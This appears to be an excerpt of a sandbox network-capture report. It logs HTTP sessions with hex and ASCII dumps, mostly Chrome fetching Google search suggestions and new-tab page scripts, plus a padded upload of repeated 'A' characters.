                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:20 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.1049710142.250.186.1644438048C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:26 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2025-03-19 13:02:26 UTC1303INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: -1
                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-JMMGqt76lTKzUCsZRQZRJw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2025-03-19 13:02:26 UTC87INData Raw: 39 35 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 65 61 74 74 6c 65 20 73 65 61 68 61 77 6b 73 22 2c 22 61 69 72 20 66 6f 72 63 65 22 2c 22 61 6c 65 78 61 20 61 6d 61 7a 6f 6e 20 65 63 68 6f 22 2c 22 70 6f 6b 65 6d 6f 6e 20 6c 65 67 6f 20 73 65 74 73 20 32 30
                                                                                                                                          Data Ascii: 954)]}'["",["seattle seahawks","air force","alexa amazon echo","pokemon lego sets 20
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 32 36 22 2c 22 64 65 6c 74 61 20 61 69 72 6c 69 6e 65 73 20 6c 61 67 75 61 72 64 69 61 20 61 69 72 70 6f 72 74 22 2c 22 6e 61 74 69 6f 6e 61 6c 20 68 75 72 72 69 63 61 6e 65 20 63 65 6e 74 65 72 22 2c 22 6e 65 77 20 76 6f 6c 63 61 6e 69 63 20 76 65 6e 74 20 69 6e 20 79 65 6c 6c 6f 77 73 74 6f 6e 65 22 2c 22 63 61 72 6e 69 76 61 6c 20 63 72 75 69 73 65 20 6c 69 6e 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 6f 49 6b 6b 34 53 46 51 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f
                                                                                                                                          Data Ascii: 26","delta airlines laguardia airport","national hurricane center","new volcanic vent in yellowstone","carnival cruise line"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNo
                                                                                                                                          2025-03-19 13:02:26 UTC918INData Raw: 30 70 73 65 55 74 53 4e 46 64 6f 55 30 74 71 55 6a 52 56 53 31 68 52 57 6d 35 78 56 33 56 57 5a 6e 52 4d 54 46 45 7a 63 54 4e 71 65 58 64 4a 65 47 35 78 51 54 51 72 4b 32 73 34 54 6c 4a 4e 63 46 70 61 65 58 4a 6b 56 30 51 78 65 47 46 49 4f 54 42 6e 4d 45 52 6a 61 30 39 42 61 31 6c 70 52 7a 4a 51 57 55 31 5a 63 55 6f 77 5a 30 4e 58 63 30 6c 70 64 32 68 57 63 57 78 5a 5a 46 56 4e 57 57 56 75 63 47 38 30 4e 56 56 44 51 57 39 48 65 48 46 61 64 6b 78 47 63 6d 70 32 4b 31 4a 34 53 45 64 4d 4c 30 35 4e 62 55 70 4c 54 33 70 6f 52 48 4a 53 4f 54 68 32 61 7a 4e 50 65 47 34 79 59 33 70 56 65 6c 4e 43 55 7a 42 47 63 43 39 57 52 57 30 79 56 6a 52 69 56 45 5a 46 56 6c 4d 79 57 46 70 68 4d 54 56 35 64 44 46 79 4e 33 51 31 51 6e 68 74 57 6c 56 31 5a 7a 4a 49 61 44 4d 32
                                                                                                                                          Data Ascii: 0pseUtSNFdoU0tqUjRVS1hRWm5xV3VWZnRMTFEzcTNqeXdJeG5xQTQrK2s4TlJNcFpaeXJkV0QxeGFIOTBnMERja09Ba1lpRzJQWU1ZcUowZ0NXc0lpd2hWcWxZZFVNWWVucG80NVVDQW9HeHFadkxGcmp2K1J4SEdML05NbUpLT3poRHJSOTh2azNPeG4yY3pVelNCUzBGcC9WRW0yVjRiVEZFVlMyWFphMTV5dDFyN3Q1QnhtWlV1ZzJIaDM2
                                                                                                                                          2025-03-19 13:02:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.1049711142.250.186.1644438048C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:26 UTC516OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2025-03-19 13:02:26 UTC1055INHTTP/1.1 200 OK
                                                                                                                                          Version: 736403927
                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                          Accept-CH: Downlink
                                                                                                                                          Accept-CH: RTT
                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:26 GMT
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2025-03-19 13:02:26 UTC335INData Raw: 32 30 31 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                          Data Ascii: 2014)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30
                                                                                                                                          Data Ascii: d gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u0
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c
                                                                                                                                          Data Ascii: e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div\u003e\u003c\/div\u003e\
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76
                                                                                                                                          Data Ascii: bindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20
                                                                                                                                          Data Ascii: -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 36 2c 33 37 30 30 39 34 39 2c 33 37 30 31 30 37 30 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c
                                                                                                                                          Data Ascii: -label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700316,3700949,3701070,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\
                                                                                                                                          2025-03-19 13:02:26 UTC935INData Raw: 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 74 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 73 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 75 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74
                                                                                                                                          Data Ascii: b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};td\u003dfunction(a){return new _.sd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.ud\u003dglobalThis.trust
                                                                                                                                          2025-03-19 13:02:26 UTC395INData Raw: 31 38 34 0d 0a 69 66 28 74 79 70 65 6f 66 20 61 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 28 30 2c 5f 2e 49 61 29 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 44 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 44 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74
                                                                                                                                          Data Ascii: 184if(typeof a!\u003d\u003d\"number\")return;return(0,_.Ia)(a)?a|0:void 0};_.Cd\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Ed\u003dfunction(){let a\u003dnull;if(!Dd)return a;try{const b\u003dc\u003d\u003ec;a\u003dDd.createPolicy(\"ogb-qt
                                                                                                                                          2025-03-19 13:02:26 UTC1390INData Raw: 38 30 30 30 0d 0a 46 64 5c 75 30 30 33 64 45 64 28 29 29 3b 72 65 74 75 72 6e 20 46 64 7d 3b 5c 6e 5f 2e 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 47 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 48 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 4b 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 66 75 6e 63 74 69
                                                                                                                                          Data Ascii: 8000Fd\u003dEd());return Fd};\n_.Id\u003dfunction(a){const b\u003d_.Gd();return new _.Hd(b?b.createScriptURL(a):a)};_.Jd\u003dfunction(a){if(a instanceof _.Hd)return a.i;throw Error(\"H\");};_.Ld\u003dfunction(a){if(Kd.test(a))return a};_.Md\u003dfuncti
